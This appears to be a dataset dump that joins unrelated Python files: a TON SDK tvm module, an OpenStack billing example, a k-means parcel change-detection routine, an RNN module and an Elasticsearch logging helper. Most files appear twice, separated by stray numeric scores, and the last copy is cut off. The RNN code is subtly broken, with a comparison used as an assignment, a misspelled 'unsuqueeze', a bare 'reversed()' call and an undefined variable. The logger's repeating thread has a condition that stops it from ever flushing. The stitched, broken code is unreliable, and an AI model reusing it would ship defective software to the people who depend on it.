def run_tvm(self, params: ParamsOfRunTvm) -> ResultOfRunTvm:
"""
Executes get methods of ABI-compatible contracts.
Performs only a part of compute phase of transaction execution that is
used to run get-methods of ABI-compatible contracts.
If you try to run get methods with `run_executor` you will get an
error, because it checks `ACCEPT` and exits if there is none, which
is actually true for get methods.
To get the account boc (bag of cells) - use `net.query` method to
download it from graphql api (field `boc` of `account`) or generate
it with `abi.encode_account` method.
To get the message boc - use `abi.encode_message` or prepare it any
other way, for instance, with Fift script.
Attention! Updated account state is produces as well, but only
`account_state.storage.state.data` part of the boc is updated.
:param params: See `types.ParamsOfRunTvm`
:return: See `types.ResultOfRunTvm`
"""
return self.request(method='tvm.run_tvm', **params.dict)
|
tonclient/tvm.py
|
from tonclient.decorators import result_as
from tonclient.module import TonModule
from tonclient.types import ParamsOfRunExecutor, ResultOfRunExecutor, \
ParamsOfRunTvm, ResultOfRunTvm, ParamsOfRunGet, ResultOfRunGet
class TonTvm(TonModule):
""" Free TON tvm SDK API implementation """
@result_as(classname=ResultOfRunGet)
def run_get(self, params: ParamsOfRunGet) -> ResultOfRunGet:
"""
Executes a get method of FIFT contract.
Executes a get method of FIFT contract that fulfills the
smc-guidelines https://test.ton.org/smc-guidelines.txt and returns
the result data from TVM's stack
:param params: See `types.ParamsOfRunGet`
:return: See `types.ResultOfRunGet`
"""
return self.request(method='tvm.run_get', **params.dict)
@result_as(classname=ResultOfRunExecutor)
def run_executor(
self, params: ParamsOfRunExecutor) -> ResultOfRunExecutor:
"""
Emulates all the phases of contract execution locally.
Performs all the phases of contract execution on Transaction Executor -
the same component that is used on Validator Nodes.
Can be used for contract debugging, to find out the reason why a
message was not delivered successfully. Validators throw away the
failed external inbound messages (if they failed before `ACCEPT`) in
the real network. This is why these messages are impossible to debug
in the real network. With the help of run_executor you can do that.
In fact, `process_message` function performs local check with
`run_executor` if there was no transaction as a result of processing
and returns the error, if there is one.
Another use case to use `run_executor` is to estimate fees for message
execution. Set `AccountForExecutor::Account.unlimited_balance` to
`true` so that emulation will not depend on the actual balance.
This may be needed to calculate deploy fees for an account that does
not exist yet. JSON with fees is in `fees` field of the result.
One more use case - you can produce the sequence of operations,
thus emulating the sequential contract calls locally. And so on.
Transaction executor requires account BOC (bag of cells) as a
parameter. To get the account BOC - use `net.query` method to download
it from GraphQL API (field `boc` of `account`) or generate it with
`abi.encode_account method`.
Also it requires message BOC. To get the message BOC - use
`abi.encode_message` or `abi.encode_internal_message`.
If you need this emulation to be as precise as possible
(for instance - emulate transaction with particular lt in particular
block or use particular blockchain config, downloaded from a
particular key block - then specify `execution_options` parameter.
If you need to see the aborted transaction as a result, not as an
error, set `skip_transaction_check` to true.
:param params: See `types.ParamsOfRunExecutor`
:return: `types.ResultOfRunExecutor`
"""
return self.request(method='tvm.run_executor', **params.dict)
@result_as(classname=ResultOfRunTvm)
def run_tvm(self, params: ParamsOfRunTvm) -> ResultOfRunTvm:
"""
Executes get methods of ABI-compatible contracts.
Performs only a part of compute phase of transaction execution that is
used to run get-methods of ABI-compatible contracts.
If you try to run get methods with `run_executor` you will get an
error, because it checks `ACCEPT` and exits if there is none, which
is actually true for get methods.
To get the account boc (bag of cells) - use `net.query` method to
download it from graphql api (field `boc` of `account`) or generate
it with `abi.encode_account` method.
To get the message boc - use `abi.encode_message` or prepare it any
other way, for instance, with Fift script.
Attention! Updated account state is produces as well, but only
`account_state.storage.state.data` part of the boc is updated.
:param params: See `types.ParamsOfRunTvm`
:return: See `types.ResultOfRunTvm`
"""
return self.request(method='tvm.run_tvm', **params.dict)
| 0.865778 | 0.532304 |
from openstack import connection
# create connection
username = "xxxxxx"
password = "<PASSWORD>"
userDomainId = "xxxxxxxxxxxxxxxxxxxxxxxxxxxx" # user account ID
auth_url = "xxxxxxxxxxxxxxxxxxxxxxxxxxxx" # endpoint url
if __name__ == '__main__':
conn = connection.Connection(auth_url=auth_url,
user_domain_id=userDomainId,
domain_id=userDomainId,
username=username,
password=password)
data = {
"orderId": "CS1909211253I0LZZ",
"payAccountType": 2,
"bpId": "198bd648de5b4437aa569061c6ba0fc4",
"couponIds": [
"CP190921034223R7H1"
]
}
'''
A customer can invoke this API to pay yearly-monthly product orders in the pending payment status.
This API can be invoked using the customer token only.
'''
ff = conn.bss.pay_period_order(userDomainId, **data)
print(ff)
data = {
"order_id": "CS1909211347TNTZY",
"unsub_type": 3,
"unsubscribe_reason_type": 2,
"unsubscribe_reason": "reason"
}
'''
A customer can invoke this API to unsubscribe from early-monthly product orders in the subscribed, changing, or failed to be provisioned status.
This API can be invoked using the customer token only.
'''
ff = conn.bss.unsubscribe_period_order(userDomainId, **data)
print(ff)
'''
A customer can invoke this API to cancel orders in the pending payment status.
This API can be invoked using the customer token only.
'''
ff = conn.bss.cancel_order(userDomainId, orderId="CS1910091053TNVOZ", action_id="cancel")
print(ff)
data = {
"order_id": "CS1906131030ERCSE",
"offset": 1,
"limit": 10
}
'''
A customer can invoke this API to cancel orders in the pending payment status.
This API can be invoked using the customer token only.
'''
ff = conn.bss.query_order_detail(userDomainId, **data)
print(ff)
data = {
"page_size": "1",
"page_index": "10"
}
'''
After a customer purchases yearly/monthly resources, it can query the orders in different statuses,
such as in the pending approval, processing, canceled, completed, and pending payment statuses.
This API can be invoked using the customer AK/SK or token.
'''
ff = conn.bss.query_order_list(userDomainId, **data)
print(ff)
'''
A customer can query the resources and original orders of the unsubscription amount for an unsubscription order or degrade order.
This API can be invoked using the AK/SK or token of the partner or the token of the partner's customer.
'''
ff = conn.bss.query_refund_order_amount(domain_id=userDomainId, order_id='CS1911122241QKILM')
print(ff)
'''
A customer can query resource details and provisioning status of an order on the partner sales platform.
This API can be invoked using the customer token only.
'''
ff = conn.bss.query_resource_status_by_orderId(userDomainId, order_id="CS1909211350H67DB")
print(ff)
|
examples/bss/v1/period_order.py
|
from openstack import connection
# create connection
username = "xxxxxx"
password = "<PASSWORD>"
userDomainId = "xxxxxxxxxxxxxxxxxxxxxxxxxxxx" # user account ID
auth_url = "xxxxxxxxxxxxxxxxxxxxxxxxxxxx" # endpoint url
if __name__ == '__main__':
conn = connection.Connection(auth_url=auth_url,
user_domain_id=userDomainId,
domain_id=userDomainId,
username=username,
password=password)
data = {
"orderId": "CS1909211253I0LZZ",
"payAccountType": 2,
"bpId": "198bd648de5b4437aa569061c6ba0fc4",
"couponIds": [
"CP190921034223R7H1"
]
}
'''
A customer can invoke this API to pay yearly-monthly product orders in the pending payment status.
This API can be invoked using the customer token only.
'''
ff = conn.bss.pay_period_order(userDomainId, **data)
print(ff)
data = {
"order_id": "CS1909211347TNTZY",
"unsub_type": 3,
"unsubscribe_reason_type": 2,
"unsubscribe_reason": "reason"
}
'''
A customer can invoke this API to unsubscribe from early-monthly product orders in the subscribed, changing, or failed to be provisioned status.
This API can be invoked using the customer token only.
'''
ff = conn.bss.unsubscribe_period_order(userDomainId, **data)
print(ff)
'''
A customer can invoke this API to cancel orders in the pending payment status.
This API can be invoked using the customer token only.
'''
ff = conn.bss.cancel_order(userDomainId, orderId="CS1910091053TNVOZ", action_id="cancel")
print(ff)
data = {
"order_id": "CS1906131030ERCSE",
"offset": 1,
"limit": 10
}
'''
A customer can invoke this API to cancel orders in the pending payment status.
This API can be invoked using the customer token only.
'''
ff = conn.bss.query_order_detail(userDomainId, **data)
print(ff)
data = {
"page_size": "1",
"page_index": "10"
}
'''
After a customer purchases yearly/monthly resources, it can query the orders in different statuses,
such as in the pending approval, processing, canceled, completed, and pending payment statuses.
This API can be invoked using the customer AK/SK or token.
'''
ff = conn.bss.query_order_list(userDomainId, **data)
print(ff)
'''
A customer can query the resources and original orders of the unsubscription amount for an unsubscription order or degrade order.
This API can be invoked using the AK/SK or token of the partner or the token of the partner's customer.
'''
ff = conn.bss.query_refund_order_amount(domain_id=userDomainId, order_id='CS1911122241QKILM')
print(ff)
'''
A customer can query resource details and provisioning status of an order on the partner sales platform.
This API can be invoked using the customer token only.
'''
ff = conn.bss.query_resource_status_by_orderId(userDomainId, order_id="CS1909211350H67DB")
print(ff)
| 0.460289 | 0.228404 |
import numpy as np
import scipy.stats
from sklearn.cluster import KMeans, MiniBatchKMeans
from sklearn.preprocessing import StandardScaler
from skimage.feature import local_binary_pattern
from skimage.color import rgb2gray
def calculate_change_values(images, masks, n_clusters, num_samples_for_kmeans=10000, use_minibatch=False):
'''
Args:
imagery: A list of `numpy.ndarray` of shape (height, width, n_channels). This imagery should cover an area that is larger than the parcel of interest by some fixed distance (i.e. a buffer value).
masks: A list of boolean `numpy.ndarray` of shape (height, width) with `1` in locations where the parcel covers and `0` everywhere else.
n_clusters: The number of clusters to use in the k-means model.
num_samples_for_kmeans: An integer specifying the number of samples to use to fit the k-means model. If `None` then all pixels in the neighborhood + footprint are used, however this is probably overkill.
use_minibatch: A flag that indicates whether we should use MiniBatchKMeans over KMeans. MiniBatchKMeans should be much faster.
Returns:
divergences: A list of KL-divergence values
'''
divergences = []
for image, mask in zip(images, masks):
h, w, c = image.shape
assert mask.shape[0] == h and mask.shape[1] == w
mask = mask.astype(bool)
# fit a k-means model and use it to cluster the image
if use_minibatch:
cluster_model = MiniBatchKMeans(n_clusters=n_clusters, n_init=3, batch_size=2000, compute_labels=True, init="random")
else:
cluster_model = KMeans(n_clusters=n_clusters, n_init=3)
features = image.reshape(h*w, c)
scaler = StandardScaler()
features = scaler.fit_transform(features)
if num_samples_for_kmeans is None or (h*w <= num_samples_for_kmeans):
labels = cluster_model.fit_predict(features)
else:
cluster_model.fit(features[np.random.choice(features.shape[0], size=num_samples_for_kmeans)])
labels = cluster_model.predict(features)
labels = labels.reshape(h,w)
# select the cluster labels that fall within the parcel and those outside of the parcel
parcel_labels = labels[mask]
neighborhood_labels = labels[~mask]
# compute the frequency with which each cluster occurs in the parcel and outside of the parcel
parcel_counts = np.bincount(parcel_labels.ravel(), minlength=n_clusters)
neighborhood_counts = np.bincount(neighborhood_labels.ravel(), minlength=n_clusters)
if parcel_labels.shape[0] > 0:
# normalize each vector of cluster index counts into discrete distributions
parcel_distribution = (parcel_counts + 1e-5) / parcel_counts.sum()
neighborhood_distribution = (neighborhood_counts + 1e-5) / neighborhood_counts.sum()
# compute the KL divergence between the two distributions
divergence = scipy.stats.entropy(parcel_distribution, neighborhood_distribution)
divergences.append(divergence)
else:
divergences.append(float('inf'))
return divergences
def calculate_change_values_with_color(images, masks):
'''
Args:
imagery: A list of `numpy.ndarray` of shape (height, width, n_channels). This imagery should cover an area that is larger than the parcel of interest by some fixed distance (i.e. a buffer value).
masks: A list of boolean `numpy.ndarray` of shape (height, width) with `1` in locations where the parcel covers and `0` everywhere else.
Returns:
distances: A list of Euclidean distances
'''
distances = []
for image, mask in zip(images, masks):
h, w, c = image.shape
assert mask.shape[0] == h and mask.shape[1] == w
colors_inside = image[mask == 1].mean(axis=0)
colors_outside = image[mask == 0].mean(axis=0)
distances.append(np.linalg.norm(
colors_outside - colors_inside
))
return distances
|
utils/tcm_algorithms.py
|
import numpy as np
import scipy.stats
from sklearn.cluster import KMeans, MiniBatchKMeans
from sklearn.preprocessing import StandardScaler
from skimage.feature import local_binary_pattern
from skimage.color import rgb2gray
def calculate_change_values(images, masks, n_clusters, num_samples_for_kmeans=10000, use_minibatch=False):
'''
Args:
imagery: A list of `numpy.ndarray` of shape (height, width, n_channels). This imagery should cover an area that is larger than the parcel of interest by some fixed distance (i.e. a buffer value).
masks: A list of boolean `numpy.ndarray` of shape (height, width) with `1` in locations where the parcel covers and `0` everywhere else.
n_clusters: The number of clusters to use in the k-means model.
num_samples_for_kmeans: An integer specifying the number of samples to use to fit the k-means model. If `None` then all pixels in the neighborhood + footprint are used, however this is probably overkill.
use_minibatch: A flag that indicates whether we should use MiniBatchKMeans over KMeans. MiniBatchKMeans should be much faster.
Returns:
divergences: A list of KL-divergence values
'''
divergences = []
for image, mask in zip(images, masks):
h, w, c = image.shape
assert mask.shape[0] == h and mask.shape[1] == w
mask = mask.astype(bool)
# fit a k-means model and use it to cluster the image
if use_minibatch:
cluster_model = MiniBatchKMeans(n_clusters=n_clusters, n_init=3, batch_size=2000, compute_labels=True, init="random")
else:
cluster_model = KMeans(n_clusters=n_clusters, n_init=3)
features = image.reshape(h*w, c)
scaler = StandardScaler()
features = scaler.fit_transform(features)
if num_samples_for_kmeans is None or (h*w <= num_samples_for_kmeans):
labels = cluster_model.fit_predict(features)
else:
cluster_model.fit(features[np.random.choice(features.shape[0], size=num_samples_for_kmeans)])
labels = cluster_model.predict(features)
labels = labels.reshape(h,w)
# select the cluster labels that fall within the parcel and those outside of the parcel
parcel_labels = labels[mask]
neighborhood_labels = labels[~mask]
# compute the frequency with which each cluster occurs in the parcel and outside of the parcel
parcel_counts = np.bincount(parcel_labels.ravel(), minlength=n_clusters)
neighborhood_counts = np.bincount(neighborhood_labels.ravel(), minlength=n_clusters)
if parcel_labels.shape[0] > 0:
# normalize each vector of cluster index counts into discrete distributions
parcel_distribution = (parcel_counts + 1e-5) / parcel_counts.sum()
neighborhood_distribution = (neighborhood_counts + 1e-5) / neighborhood_counts.sum()
# compute the KL divergence between the two distributions
divergence = scipy.stats.entropy(parcel_distribution, neighborhood_distribution)
divergences.append(divergence)
else:
divergences.append(float('inf'))
return divergences
def calculate_change_values_with_color(images, masks):
'''
Args:
imagery: A list of `numpy.ndarray` of shape (height, width, n_channels). This imagery should cover an area that is larger than the parcel of interest by some fixed distance (i.e. a buffer value).
masks: A list of boolean `numpy.ndarray` of shape (height, width) with `1` in locations where the parcel covers and `0` everywhere else.
Returns:
distances: A list of Euclidean distances
'''
distances = []
for image, mask in zip(images, masks):
h, w, c = image.shape
assert mask.shape[0] == h and mask.shape[1] == w
colors_inside = image[mask == 1].mean(axis=0)
colors_outside = image[mask == 0].mean(axis=0)
distances.append(np.linalg.norm(
colors_outside - colors_inside
))
return distances
| 0.858303 | 0.782372 |
import torch
import torch.nn as nn
import torch.nn.functional as F
class RnnCommon(nn.Module):
def __init__(self,
input_size,
hidden_size,
layer_num,
batch_first,
drop_out = 0.0,
biderction=True,
rnn_type = "LSTM"
):
super(RnnCommon,self).__init__()
self._rnn_type =rnn_type
self._input_size = input_size
self._hidden_size = hidden_size
self._layer_num = layer_num
self._bidirection = biderction
self._batch_first = batch_first
self._num_direction == 2 if self._bidirection else 1
if self._rnn_type == "LSTM":
self._rnn_cell = nn.LSTMCell
elif self._rnn_type == "RNN":
self._rnn_cell = nn.RNNCell
elif self._rnn_type == "GRU":
self._rnn_cell = nn.GRUCell
#定义前向和后向的cell实现多层
self._fw_cell = nn.ModuleList()
self._bw_cell = nn.ModuleList()
for i in range(self._layer_num):
layer_input_size = self._input_size if i == 0 else self._hidden_size*self._num_direction
self._fw_cell.append(self._rnn_cell(layer_input_size,self._hidden_size))
if self._bidirection:
self._bw_cell.append(self._rnn_cell(layer_input_size,self._hidden_size))
def _forward(self,cell,input,init_hidden,mask):
if self._batch_first:
input = input.transpose(0,1)
seq_len = input.shape[1]
output = []
for i in range(seq_len):
if self._rnn_type == "LSTM":
h1,c1 = cell(input[i],init_hidden)
h1 = h1 * mask[i]
c1 = c1 * mask[i]
output.append(h1)
init_hidden =(h1,c1)
else:
h1 = cell(input[i],init_hidden)
h1 = h1 * mask[i]
output.append(h1)
init_hidden = h1
output = torch.stack(output,dim=0)
return output,init_hidden
def _backward(self,cell,input,init_hidden,mask):
if self._batch_first:
input = input.transpose(0,1)
seq_len = input.shape[0]
output = []
for i in reversed(range(seq_len)):
if self._rnn_type == "LSTM":
h1,c1= cell(input[i],init_hidden)
h1 = h1 * mask[i]
c1 = c1 * mask[i]
output.append(h1)
init_hidden = (h1,c1)
else:
output.append(h1)
init_hidden = h1
output = torch.stack(output,dim=0)
reversed()
return output,init_hidden
def forward(self, inputs,mask,init_hidden = None):
'''
:param inputs: [batch,seq,input_size] if batch_first
:param init_hideen:
:param mask :[batch,seq]
:return:
'''
hn = []
cn = []
inputs = inputs.transpose(0,1) if self._batch_first else inputs
mask = mask.transpose(0,1)
mask= mask.unsuqueeze(dim=2).expand((-1,-1,self._hidden_size))
if init_hidden == None:
init_hidden =init_hidden(inputs.shape[1])
for i in range(self._layer_num):
#fw_output,bw_output of shape [seq_len,batch,hidden_size]
#fw_hn of shape [batch_size,hidden_size]
fw_output,fw_hidden =self._forward(self._fw_cell[i],inputs,init_hidden,mask)
if self._bidirection:
bw_output,bw_hidden = self._backward(self._bw_cell[i],inputs,init_hidden,mask)
if self._rnn_type == "LSTM":
hn.append(torch.cat((fw_hidden[0],bw_hidden[0]),dim=1) if self._bidirection else fw_hidden[0])
cn.append(torch.cat((fw_hidden[1],bw_hidden[1]),dim=1) if self._bidirection else fw_hidden[1])
else:
hn.append(torch.cat((fw_hidden,bw_hidden),dim=1) if self._bidirection else fw_hidden)
inputs = torch.cat((fw_output,bw_output),dim=2)
output = inputs.transpose(0,1)
hn = torch.stack(hn,dim=0)
if self._rnn_type =="LSTM":
cn = torch.stack(cn,dim=0)
hidden = (hn,cn)
else:
hidden = hn
return output,hidden
def init_hidden(self,batch_size):
h0 = torch.zeros(batch_size,self._hidden_size)
if self._rnn_type == "LSTM":
return h0,h0
else :
return h0
|
baseline/lstm/model/RNN_Common.py
|
import torch
import torch.nn as nn
import torch.nn.functional as F
class RnnCommon(nn.Module):
def __init__(self,
input_size,
hidden_size,
layer_num,
batch_first,
drop_out = 0.0,
biderction=True,
rnn_type = "LSTM"
):
super(RnnCommon,self).__init__()
self._rnn_type =rnn_type
self._input_size = input_size
self._hidden_size = hidden_size
self._layer_num = layer_num
self._bidirection = biderction
self._batch_first = batch_first
self._num_direction == 2 if self._bidirection else 1
if self._rnn_type == "LSTM":
self._rnn_cell = nn.LSTMCell
elif self._rnn_type == "RNN":
self._rnn_cell = nn.RNNCell
elif self._rnn_type == "GRU":
self._rnn_cell = nn.GRUCell
#定义前向和后向的cell实现多层
self._fw_cell = nn.ModuleList()
self._bw_cell = nn.ModuleList()
for i in range(self._layer_num):
layer_input_size = self._input_size if i == 0 else self._hidden_size*self._num_direction
self._fw_cell.append(self._rnn_cell(layer_input_size,self._hidden_size))
if self._bidirection:
self._bw_cell.append(self._rnn_cell(layer_input_size,self._hidden_size))
def _forward(self,cell,input,init_hidden,mask):
if self._batch_first:
input = input.transpose(0,1)
seq_len = input.shape[1]
output = []
for i in range(seq_len):
if self._rnn_type == "LSTM":
h1,c1 = cell(input[i],init_hidden)
h1 = h1 * mask[i]
c1 = c1 * mask[i]
output.append(h1)
init_hidden =(h1,c1)
else:
h1 = cell(input[i],init_hidden)
h1 = h1 * mask[i]
output.append(h1)
init_hidden = h1
output = torch.stack(output,dim=0)
return output,init_hidden
def _backward(self,cell,input,init_hidden,mask):
if self._batch_first:
input = input.transpose(0,1)
seq_len = input.shape[0]
output = []
for i in reversed(range(seq_len)):
if self._rnn_type == "LSTM":
h1,c1= cell(input[i],init_hidden)
h1 = h1 * mask[i]
c1 = c1 * mask[i]
output.append(h1)
init_hidden = (h1,c1)
else:
output.append(h1)
init_hidden = h1
output = torch.stack(output,dim=0)
reversed()
return output,init_hidden
def forward(self, inputs,mask,init_hidden = None):
'''
:param inputs: [batch,seq,input_size] if batch_first
:param init_hideen:
:param mask :[batch,seq]
:return:
'''
hn = []
cn = []
inputs = inputs.transpose(0,1) if self._batch_first else inputs
mask = mask.transpose(0,1)
mask= mask.unsuqueeze(dim=2).expand((-1,-1,self._hidden_size))
if init_hidden == None:
init_hidden =init_hidden(inputs.shape[1])
for i in range(self._layer_num):
#fw_output,bw_output of shape [seq_len,batch,hidden_size]
#fw_hn of shape [batch_size,hidden_size]
fw_output,fw_hidden =self._forward(self._fw_cell[i],inputs,init_hidden,mask)
if self._bidirection:
bw_output,bw_hidden = self._backward(self._bw_cell[i],inputs,init_hidden,mask)
if self._rnn_type == "LSTM":
hn.append(torch.cat((fw_hidden[0],bw_hidden[0]),dim=1) if self._bidirection else fw_hidden[0])
cn.append(torch.cat((fw_hidden[1],bw_hidden[1]),dim=1) if self._bidirection else fw_hidden[1])
else:
hn.append(torch.cat((fw_hidden,bw_hidden),dim=1) if self._bidirection else fw_hidden)
inputs = torch.cat((fw_output,bw_output),dim=2)
output = inputs.transpose(0,1)
hn = torch.stack(hn,dim=0)
if self._rnn_type =="LSTM":
cn = torch.stack(cn,dim=0)
hidden = (hn,cn)
else:
hidden = hn
return output,hidden
def init_hidden(self,batch_size):
h0 = torch.zeros(batch_size,self._hidden_size)
if self._rnn_type == "LSTM":
return h0,h0
else :
return h0
| 0.783285 | 0.298447 |
import atexit
import datetime
import functools
import hashlib
import logging
import os
import socket
import threading
import time
import traceback
from copy import deepcopy
import elasticsearch
import elasticsearch.helpers
class Constants:
HOST_KEY = 'host'
PROCESS_KEY = 'process'
THREAD_NAME_KEY = 'threadName'
THREAD_ID_KEY = 'thread'
USERNAME_KEY = 'username'
TIMESTAMP_KEY = 'timestamp'
INFO_VALUE = 'INFO'
WARN_VALUE = 'WARN'
ERROR_VALUE = 'ERROR'
LEVEL_NAME_KEY = 'levelname'
FEATURE_NAME_KEY = 'feature_name'
FEATURE_DURATION_KEY = 'feature_duration_seconds'
class RepeatingThread(threading._Timer):
def run(self):
while not self.finished.wait(self.interval) and self.finished.is_set():
try:
self.function(*self.args, **self.kwargs)
except Exception as e:
# keep going, and try again in the next time slot to push data
pass
class ElasticSearchHelper(object):
def __init__(self, client, index, extra_values=None, auto_flush=True, flush_period_seconds=20):
"""
:param client: ElasticSearch Client that's already initialized
:param index: index name without wildcard (year and date will be automatically added, foo_index -> foo_index.year.month)
:param extra_values: dictionary of extra values that will go with every request
:param auto_flush: Whether or not
:param flush_period_seconds: The frequency of flushing in seconds
"""
assert index.islower(), "index must be all lower-case. This is an ElasticSearch limitation"
self.client = client
self.index = index
self.flush_thread = None
if auto_flush:
self.flush_thread = RepeatingThread(flush_period_seconds, self.flush_buffer)
self.actions_buffer = []
self.validate_connection()
self.extra_values = extra_values or {}
# make sure we flush when process exit
atexit.register(self.on_process_exit)
@classmethod
def get_instance(cls, host, index, port=9200, use_ssl=False, verify_certs=True,
connection_class=elasticsearch.RequestsHttpConnection,
**kwargs):
"""
Factory method for easy construction
:rtype: ElasticSearchHelper
"""
client = elasticsearch.Elasticsearch(hosts=[{'host': host, 'port': port}], use_ssl=use_ssl,
verify_certs=verify_certs,
connection_class=connection_class, **kwargs)
return cls(client, index)
def change_flush_interval(self, interval):
"""
Change flush interval of buffering thread
:param interval: interval in seconds
"""
assert self.flush_thread, "Cannot change flush interval when auto_flush is False"
self.flush_thread.interval = interval
def on_process_exit(self):
"""
This will be called when process exit to flush remaining records if auto_flush is enabled
:return: None
"""
if self.flush_thread:
self.flush_thread.cancel()
self.flush_buffer()
def add_elasticsearch_records(self, data_list):
"""
add records to buffer. Will not be pushed to elasticsearch unless flush_buffer is called
:param data_list: list of dict that contains data to be pushed, default_values will be automatically added to each dictionary
each dict cannot contain duplicate keys with default_values
:return: None
"""
actions = [self.create_data_record(data_dict) for data_dict in data_list]
self.actions_buffer.extend(actions)
def flush_buffer(self):
"""
Flush buffer and push it to elasticsearch
:return: None
"""
if not self.actions_buffer:
return
# reset actions buffer and take what's currently in the list
actions = self.actions_buffer
self.actions_buffer = []
try:
elasticsearch.helpers.bulk(self.client, actions, stats_only=True)
except Exception as e:
# put actions back if it failed
self.actions_buffer.extend(actions)
raise
def create_data_record(self, data_dict):
"""
Create data record (dict) that is ready to be pushed to elasticsearch
:param data_dict:
:return: dict of elastic search record
:rtype: dict
"""
source_dict = deepcopy(data_dict)
assert not self.is_conflicting_keys(data_dict,
self.default_values), "Conflicting keys between default_values and extra_values"
source_dict.update(self.default_values)
return {
'_index': self.get_full_index(),
'_type': 'python_log',
'_source': source_dict
}
@classmethod
def is_conflicting_keys(cls, d1, d2):
"""
Return trur if there are conflicting keys between 2 dictionaries
:param d1:
:param d2:
:return:
"""
return bool(set(d1.keys()).intersection(set(d2.keys())))
def get_full_index(self):
"""
get index name
:rtype: str
:return: Index name with year and month attached to it
"""
datenow = datetime.datetime.utcnow()
index = '{index}-{year}.{month}'.format(index=self.index, year=datenow.year, month=datenow.month)
return index
@property
def default_values(self):
data_dict = {
Constants.HOST_KEY: socket.getfqdn(),
Constants.PROCESS_KEY: os.getpid(),
Constants.THREAD_NAME_KEY: threading.current_thread().name,
Constants.THREAD_ID_KEY: threading.current_thread().ident,
Constants.TIMESTAMP_KEY: str(datetime.datetime.utcnow().isoformat())
}
assert not self.is_conflicting_keys(data_dict,
self.extra_values), "Conflicting keys between default_values and extra_values"
data_dict.update(self.extra_values)
return data_dict
def validate_connection(self):
"""
ping server to make sure it's reachable. Raises exception if server cannot be reached
:return:
"""
for hostInfo in self.client.transport.hosts:
host = hostInfo.get('host')
port = hostInfo.get('port')
self.validate_server_connection(host, port)
@classmethod
def validate_server_connection(cls, host, port):
url = 'http://{}:{}'.format(host, port)
import requests
res = requests.get(url)
assert res.status_code == 200, "Failed to connect to ElasticSearch Server {}".format(url)
def log_feature(self, feature_name, feature_duration_seconds=None, levelname=Constants.INFO_VALUE, **kwargs):
"""
log feature and it to buffer, this will not push data immediately to elastic search. Subsequent call to flush_buffer is required if auto_flush is disabled
:param feature_name: feature name in string
:param feature_duration_seconds: time it took to complete this feature in seconds
:param levelname: Severity of this log (INFO, ERROR, WARN)
:param kwargs: additional values to be added to the record
:return:
"""
data_dict = {
Constants.FEATURE_NAME_KEY: feature_name,
Constants.LEVEL_NAME_KEY: levelname,
}
data_dict.update(**kwargs)
if feature_duration_seconds is not None:
data_dict.update({Constants.FEATURE_DURATION_KEY: feature_duration_seconds})
self.add_elasticsearch_records([data_dict])
def log_feature_error(self, feature_name, feature_duration_seconds=None, **kwargs):
"""
Log feature as an error, Same as log_feature but with levelname = ERROR
"""
self.log_feature(feature_name, feature_duration_seconds=feature_duration_seconds,
levelname=Constants.ERROR_VALUE, **kwargs)
def log_feature_decorator(self, feature_name, **feature_kwargs):
"""
Decorator to be used on any function, without changing its behavior. Each call to the decorated function will add it to buffer
:param feature_name: feature name in string
:param feature_kwargs: Additional values that will be added to each function call
:return:
"""
# create actual decorator, since this decorator take an argument of featureName
def decorator(function):
@functools.wraps(function)
def wrapper(*args, **kwargs):
start = time.time()
# execute function
try:
return_val = function(*args, **kwargs)
duration_seconds = time.time() - start
try:
self.log_feature(feature_name, duration_seconds, **feature_kwargs)
except Exception as e:
logging.debug("Couldn't log feature", exc_info=1)
return return_val
except Exception as e:
exc_text = traceback.format_exc()
duration_seconds = time.time() - start
exc_hash = hashlib.sha1(exc_text).hexdigest()
try:
self.log_feature_error(feature_name, duration_seconds,
exc_text=exc_text,
exc_hash=exc_hash,
exc_message=e.message,
**feature_kwargs)
except Exception as e:
logging.debug("Couldn't log feature error", exc_info=1)
raise
return wrapper
return decorator
class MockElasticSearchHelper(ElasticSearchHelper):
def __init__(self, *args, **kwargs):
super(MockElasticSearchHelper, self).__init__(client=None, index='none', auto_flush=False)
def validate_connection(self):
pass
def log_feature(self, *args, **kwargs):
pass
def log_feature_error(self, *args, **kwargs):
pass
def log_feature_decorator(self, feature_name, **feature_kwargs):
def decorator(function):
return function
return decorator
|
elasticsearch_util/helper.py
|
import atexit
import datetime
import functools
import hashlib
import logging
import os
import socket
import threading
import time
import traceback
from copy import deepcopy
import elasticsearch
import elasticsearch.helpers
class Constants:
HOST_KEY = 'host'
PROCESS_KEY = 'process'
THREAD_NAME_KEY = 'threadName'
THREAD_ID_KEY = 'thread'
USERNAME_KEY = 'username'
TIMESTAMP_KEY = 'timestamp'
INFO_VALUE = 'INFO'
WARN_VALUE = 'WARN'
ERROR_VALUE = 'ERROR'
LEVEL_NAME_KEY = 'levelname'
FEATURE_NAME_KEY = 'feature_name'
FEATURE_DURATION_KEY = 'feature_duration_seconds'
class RepeatingThread(threading._Timer):
def run(self):
while not self.finished.wait(self.interval) and self.finished.is_set():
try:
self.function(*self.args, **self.kwargs)
except Exception as e:
# keep going, and try again in the next time slot to push data
pass
class ElasticSearchHelper(object):
def __init__(self, client, index, extra_values=None, auto_flush=True, flush_period_seconds=20):
"""
:param client: ElasticSearch Client that's already initialized
:param index: index name without wildcard (year and date will be automatically added, foo_index -> foo_index.year.month)
:param extra_values: dictionary of extra values that will go with every request
:param auto_flush: Whether or not
:param flush_period_seconds: The frequency of flushing in seconds
"""
assert index.islower(), "index must be all lower-case. This is an ElasticSearch limitation"
self.client = client
self.index = index
self.flush_thread = None
if auto_flush:
self.flush_thread = RepeatingThread(flush_period_seconds, self.flush_buffer)
self.actions_buffer = []
self.validate_connection()
self.extra_values = extra_values or {}
# make sure we flush when process exit
atexit.register(self.on_process_exit)
@classmethod
def get_instance(cls, host, index, port=9200, use_ssl=False, verify_certs=True,
connection_class=elasticsearch.RequestsHttpConnection,
**kwargs):
"""
Factory method for easy construction
:rtype: ElasticSearchHelper
"""
client = elasticsearch.Elasticsearch(hosts=[{'host': host, 'port': port}], use_ssl=use_ssl,
verify_certs=verify_certs,
connection_class=connection_class, **kwargs)
return cls(client, index)
def change_flush_interval(self, interval):
"""
Change flush interval of buffering thread
:param interval: interval in seconds
"""
assert self.flush_thread, "Cannot change flush interval when auto_flush is False"
self.flush_thread.interval = interval
def on_process_exit(self):
"""
This will be called when process exit to flush remaining records if auto_flush is enabled
:return: None
"""
if self.flush_thread:
self.flush_thread.cancel()
self.flush_buffer()
def add_elasticsearch_records(self, data_list):
"""
add records to buffer. Will not be pushed to elasticsearch unless flush_buffer is called
:param data_list: list of dict that contains data to be pushed, default_values will be automatically added to each dictionary
each dict cannot contain duplicate keys with default_values
:return: None
"""
actions = [self.create_data_record(data_dict) for data_dict in data_list]
self.actions_buffer.extend(actions)
